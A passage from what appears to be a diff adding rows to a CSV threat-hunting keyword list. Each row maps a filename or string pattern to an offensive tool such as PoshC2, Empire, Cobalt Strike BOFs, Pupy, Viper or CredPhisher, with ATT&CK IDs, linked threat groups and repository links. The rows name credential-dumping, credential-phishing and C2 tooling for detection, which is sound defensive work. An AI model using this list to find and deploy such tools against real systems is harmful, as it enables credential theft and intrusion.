to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*createlinuxpayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*Create-MultipleSessions.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Create-NamedPipe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*createnewpayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - 
T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*createnewshellcode*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*createpbindpayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*CreateProcessAsUser*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z"
+"*createproxypayload -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*createproxypayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*Create-SuspendedWinLogon*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Create-WinLogonProcess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*credBandit * output*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 
- T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","0","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z"
+"*credBandit.*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" 
+"*credBanditx64*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" +"*creddump.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Credential Guard bypass might fail if RunAsPPL is enabled*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*CredentialAccess_CredentialDumping_BrowserDataCSharp.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*CredentialAccess_CredentialDumping_KiwiOnLocal.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - 
T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*CredentialAccess_CredentialDumping_SunLogin.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*CredentialAccess_CredentialDumping_WindowsHashDump.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*CredentialAccess_CredentialDumping_WindowsWDigestEnable.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - 
T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*CredentialAccess_CredentialInFiles_BrowserData.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*CredentialAccess_CredentialInFiles_WindowsSoftware.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*CredentialAccess_InputCapture_CredUIPromptForWindowsCredentialsW.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*Credentials Found in Configurations!*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z"
+"*Credentials*hekatomb_*.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*Credentials/CacheDump.*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z"
+"*Credentials/certsync_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*Credentials/LSASecrets.*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI 
Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z"
+"*Credentials/SAMDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*CredPhisher.csproj*","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*CredPhisher.exe*","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*credphisher.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*cred-popper *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*CredPrompt/CredPrompt.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 
- TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*creds_hunt.exe*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10",,"N/A",,, +"*CredsLeaker*","offensive_tool_keyword","CredsLeaker","This script used to display a powershell credentials box asked the user for credentials. However. That was highly noticeable. Now its time to utilize Windows Security popup!","T1087 - T1056 - T1003 - T1059 - T1110","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/Dviros/CredsLeaker","1","1","N/A","N/A","3","295","73","2021-03-31T11:49:57Z","2018-03-05T07:53:31Z" +"*CredsPhish.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*Credz-Plz.ps1*","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" 
